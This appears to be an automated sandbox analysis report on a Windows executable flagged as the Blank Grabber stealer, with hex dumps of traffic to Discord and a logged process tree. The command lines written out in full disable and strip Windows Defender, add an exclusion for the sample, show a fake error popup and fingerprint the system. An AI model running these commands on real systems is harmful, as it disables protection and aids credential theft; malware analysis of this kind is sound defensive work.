                                                                                                                                                                                                                            2024-12-13 07:38:38 UTC16384OUTData Raw: 67 26 39 47 be 38 6f da af 7a 8a 5e a0 e7 d6 1a 5d 37 be ff 09 5e cc e3 7e 0e c7 cc f3 c8 8a be d6 15 ef 4f 9a 69 91 0c 03 ee f3 4d c0 e4 94 f1 d2 5a a3 6b 36 7e 11 5f 7a 1d 71 ae dc 94 88 5f d3 40 cd ee 2d a5 86 94 49 cd d9 ca 7b 54 4a f2 16 88 8f 8c b3 9d fb 68 4b 03 b2 48 4d a9 37 5d 05 7e 87 6a df 1b 04 8d 50 87 ec b9 da b2 53 db 82 36 37 6c b7 24 99 50 b5 52 fc 4a 21 fa 4e 31 4e f7 31 25 35 75 23 f8 1e 11 54 40 4a ac 20 a7 87 76 15 04 1c a4 4d 3c 0d 4a e8 31 b5 5b c2 20 68 88 5e fd 12 e1 61 19 e1 2a fc b4 ba ca a0 e7 d6 55 f7 6e c5 ca f6 20 55 2a c1 24 99 2c e0 80 98 2e d0 51 71 e7 aa a6 ae 81 02 9b 4c 83 88 f5 cc cf c9 26 38 38 ac 71 b0 93 33 86 d5 a8 77 a9 66 d5 bd 91 ee c9 50 78 37 11 2b 8b 21 c7 a5 4d 26 37 6d 5a ea f6 61 32 ff 1e 34 3f 67 4f 1f
                                                                                                                                                                                                                            Data Ascii: g&9G8oz^]7^~OiMZk6~_zq_@-I{TJhKHM7]~jPS67l$PRJ!N1N1%5u#T@J vM<J1[ h^a*Un U*$,.QqL&88q3wfPx7+!M&7mZa24?gO
                                                                                                                                                                                                                            2024-12-13 07:38:38 UTC16384OUTData Raw: 88 9e b9 18 07 a4 d8 f0 1b 0f ce d1 a0 51 c4 94 1a 18 03 26 87 c8 a0 ab 41 a9 7f 5b 56 d4 ee e2 bd d1 0c 0c 7c 60 98 21 8c 6b 5f ad 73 e4 90 43 8a b8 a9 95 a0 0b 32 c7 ca 7f 38 21 18 e0 62 b7 39 8f 42 60 aa b2 40 59 e1 41 74 7c 07 2e be 90 38 08 24 6b 5a 90 5f 98 74 87 03 67 b7 67 ae cc ae 9d f2 54 a2 53 57 8c 62 e0 30 84 03 a4 cc 78 4b 53 83 8b 0a 00 64 e2 d3 96 77 00 3b 8e 9c f0 9b d9 ec 73 8d 42 34 0c 43 bd ba 13 88 73 02 dc 0a cf 6c c7 b0 62 60 40 70 e4 08 ef d6 2e 14 5e e8 ae f9 36 1b fd bd a5 99 fa 48 bd cc 8d 4f 15 bf db df 62 98 b9 d8 99 05 c6 83 b8 08 7e 9a da 46 4b ee ae fe 17 76 cd 6b 08 f3 d8 f9 2a ea a8 9c 43 5c ae f0 ed 6d 90 6a d5 96 26 f4 5f 32 54 3d 2c a1 de 33 29 18 4f 92 d8 c3 9c 40 29 3f 33 47 5e 39 ef 1c ed b7 cc 45 9c 8b 65 8a 92 96
                                                                                                                                                                                                                            Data Ascii: Q&A[V|`!k_sC28!b9B`@YAt|.8$kZ_tggTSWb0xKSdw;sB4Cslb`@p.^6HOb~FKvk*C\mj&_2T=,3)O@)?3G^9Ee
                                                                                                                                                                                                                            2024-12-13 07:38:38 UTC16384OUTData Raw: 36 3d f2 c3 9c 98 42 65 dc 42 13 a4 24 1f 7f 6d 99 68 4f 4d 46 a2 fb 9b f5 02 3c 12 94 e1 7f 27 dc 72 ad ec 02 f7 53 ab da ca 30 fa d6 6a 0c 2b 7d 5b 1e 37 e2 e2 f2 f1 db 60 e2 60 87 50 48 67 3c c9 cc c9 9c 71 72 2f d1 3c 6b 04 5d f3 f4 79 62 1e 57 3d a3 78 f6 76 78 ff 86 f8 79 d0 92 ed 42 70 aa 8d 91 8e 7e 2c dd 52 51 52 82 36 27 47 d8 59 e8 06 a8 79 bc 6b 86 64 0c 9e 05 a7 84 84 7f 19 eb 06 87 7c 92 7a 16 7c 70 ec d4 6d f2 2c 51 eb 8b b0 29 63 c4 3d 72 55 5e 7f e4 dc 6a c7 a0 5c d2 92 0b e9 ee 24 88 9b d2 8a 93 10 46 97 91 c9 4c 94 97 6e db c1 a5 c8 72 46 0a 98 02 3e 6d da 9f 9e ae 21 5e b9 85 e9 1a 53 fb d1 10 18 a9 70 fc 22 57 03 d8 48 63 12 b0 49 a3 f5 8b 6e b8 28 16 62 1f 1e 04 ba 29 64 16 da 86 21 f7 e8 a5 7f c5 73 3c 6a 85 cd 7f 65 c6 a4 a6 16 15
                                                                                                                                                                                                                            Data Ascii: 6=BeB$mhOMF<'rS0j+}[7``PHg<qr/<k]ybW=xvxyBp~,RQR6'GYykd|z|pm,Q)c=rU^j\$FLnrF>m!^Sp"WHcIn(b)d!s<je
                                                                                                                                                                                                                            2024-12-13 07:38:40 UTC1265INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                            Date: Fri, 13 Dec 2024 07:38:40 GMT
                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                            x-ratelimit-reset: 1734075521
                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tx%2BJOy3W%2Fj6%2FZNhfBMrLuKCjk2aniXvX%2Bevuba68UlAfsef62gGbltAlNJ1TBi%2BhHRmPnZnM1fNgXqNAS3R2E6O%2FdyIWFAugz4daKez7DSO%2FfNDcG4xbQSJQ31%2Bl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            Set-Cookie: __cfruid=7c9e703a624a385c05903c9da053e83e56587a9a-1734075520; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                            Set-Cookie: _cfuvid=kMelNpAhNdRlaZ1Uw0BI93eBNOmpVEH9iE4vc1SB4ww-1734075520206-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8f144bba1e6742d7-EWR


                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:02:37:54
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\sppawx.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff79a310000
                                                                                                                                                                                                                            File size:7'834'524 bytes
                                                                                                                                                                                                                            MD5 hash:546606959CB5B178D679B203D938CF88
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1299449724.00000213D8524000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1299449724.00000213D8522000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:02:37:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\sppawx.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff79a310000
                                                                                                                                                                                                                            File size:7'834'524 bytes
                                                                                                                                                                                                                            MD5 hash:546606959CB5B178D679B203D938CF88
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1739009557.0000018C01A4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:02:37:57
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                            Start time:02:37:57
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                            Start time:02:37:57
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                            Start time:02:37:57
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                            Start time:02:37:57
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                            Start time:02:37:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                            Start time:02:37:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                            Start time:02:37:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                            Start time:02:37:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                            Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                            Start time:02:37:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
                                                                                                                                                                                                                            Imagebase:0x7ff711e90000
                                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                                            MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                            Start time:02:37:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'
                                                                                                                                                                                                                            Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                            Start time:02:37:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff7e2d20000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                            Start time:02:37:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                            Start time:02:37:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                            Start time:02:37:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                            Imagebase:0x7ff7a81b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                            Start time:02:38:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                            Start time:02:38:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                            Start time:02:38:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                            Imagebase:0x7ff6f3ac0000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                            Start time:02:38:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                            Start time:02:38:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                            Start time:02:38:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                            Imagebase:0x7ff6f3ac0000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                            Start time:02:38:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff772ad0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                            Start time:02:38:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                            Start time:02:38:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                            Imagebase:0x7ff7a81b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                            Start time:02:38:05
                                                                                                                                                                                                                            Start date:13/12/2024
